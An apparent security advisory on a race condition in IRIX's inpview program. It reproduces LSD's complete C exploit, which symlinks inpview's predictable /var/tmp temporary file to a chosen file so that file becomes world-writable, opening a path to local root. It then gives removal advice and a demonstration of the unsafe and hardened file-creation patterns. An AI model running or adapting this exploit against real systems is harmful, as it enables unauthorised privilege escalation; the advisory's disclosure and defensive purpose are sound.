COMMAND

    inpview

SYSTEMS AFFECTED

    IRIX 5.3...6.5.10

PROBLEM

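    There exists a race condition vulnerability in the inpview program
    (/usr/lib/InPerson/inpview). When appropriately exploited it can
    lead to a local root compromise on a vulnerable system. Found by
    LSD. The exploit below watches /var/tmp for inpview's temporary
    file (a name beginning with .ilmpAAA) and puts a symbolic link to a
    user-chosen file at that name; per the exploit's own header comment,
    that file is left with rw-rw-rw permissions.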

    /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland        *://lsd-pl.net/ #*/
    /*## /usr/lib/InPerson/inpview                                               #*/

    /*   sets rw-rw-rw permissions                                                */

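    #include <sys/types.h>
    #include <dirent.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc,char **argv){
        DIR *dirp;struct dirent *dentp;
        char name[256];

        printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland  //lsd-pl.net/\n");
        printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n");

        if(argc!=2){
            printf("usage: %s file\n",argv[0]);
            exit(-1);
        }

        /* child: after a short delay, run inpview with stdio closed */
        if(!fork()){
            nice(-20);sleep(2);close(0);close(1);close(2);
            execle("/usr/lib/InPerson/inpview","lsd",(char*)0,(char**)0);
            _exit(1);
        }

        /* parent: poll /var/tmp until inpview's temporary file appears */
        printf("looking for temporary file... ");fflush(stdout);
        chdir("/var/tmp");
        dirp=opendir(".");
        while(1){
            if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;}
            if(!strncmp(dentp->d_name,".ilmpAAA",8)) break;
        }
        /* copy the name: dentp is not valid after closedir() */
        strncpy(name,dentp->d_name,sizeof(name)-1);name[sizeof(name)-1]=0;
        closedir(dirp);
        printf("found!\n");
        /* race window: symlink() succeeds only once that name is free */
        while(1){
            if(!symlink(argv[1],name)) break;
        }
        sleep(2);
        unlink(name);

        /* show the resulting permissions of the target file */
        execl("/bin/ls","ls","-l",argv[1],(char*)0);
        return 1;
    }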

SOLUTION

    No  SGI  patches   are  currently  available   for  the   InPerson
    application.   Please  remove  the  InPerson  software  from  your
    system.  InPerson functionality has been replaced with  SGImeeting
    which  is   compatible  with   Microsoft  NetMeeting,   PictureTel
    LiveShare Plus,  SunForum, HP  Visual Conference  and other  T.120
    compliant clients.
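
    The class of flaw the exploit above relies on, as an added example
    (not code from the advisory, LSD or SGI): inpview's source is not
    shown, so unsafe_create() is an assumed reconstruction of the usual
    pattern, and the function names, scratch directory and .ilmpAAA0000
    file name are constructed. It sets a pre-planted symlink against a
    path-based chmod() and against O_EXCL with fchmod().

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* ASSUMED vulnerable pattern (inpview's source is not on the page): open a
 * predictable name, following symlinks, then change the mode by path. */
static int unsafe_create(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT, 0600);
    if (fd >= 0) chmod(path, 0666);   /* resolves path again, follows link */
    return fd;
}

/* Hardened: O_EXCL refuses any pre-existing name (a symlink included),
 * and fchmod() acts on the descriptor, never on a re-resolved path. */
static int safe_create(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd >= 0 && fchmod(fd, 0666) < 0) { close(fd); return -1; }
    return fd;
}

/* Private scratch dir with a 0600 "victim" file and a link planted at the
 * temp name; runs one creator and returns the victim's mode (-1 on error). */
int victim_mode_after(int hardened) {
    char dir[] = "/tmp/inpview-demo-XXXXXX", victim[64], tmp[64];
    struct stat st;
    int fd, mode = -1;

    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/.ilmpAAA0000", dir);  /* constructed name */
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0 && fchmod(fd, 0600) == 0 && symlink(victim, tmp) == 0) {
        close(fd);
        fd = hardened ? safe_create(tmp) : unsafe_create(tmp);
        if (stat(victim, &st) == 0) mode = st.st_mode & 0777;
    }
    if (fd >= 0) close(fd);
    unlink(tmp); unlink(victim); rmdir(dir);
    return mode;
}

int main(void) {
    printf("unsafe:   victim mode %o\n", victim_mode_after(0));
    printf("hardened: victim mode %o\n", victim_mode_after(1));
    return 0;
}
```

    mkstemp() gives the same exclusive-create guarantee with an
    unpredictable name and is the usual choice for new code.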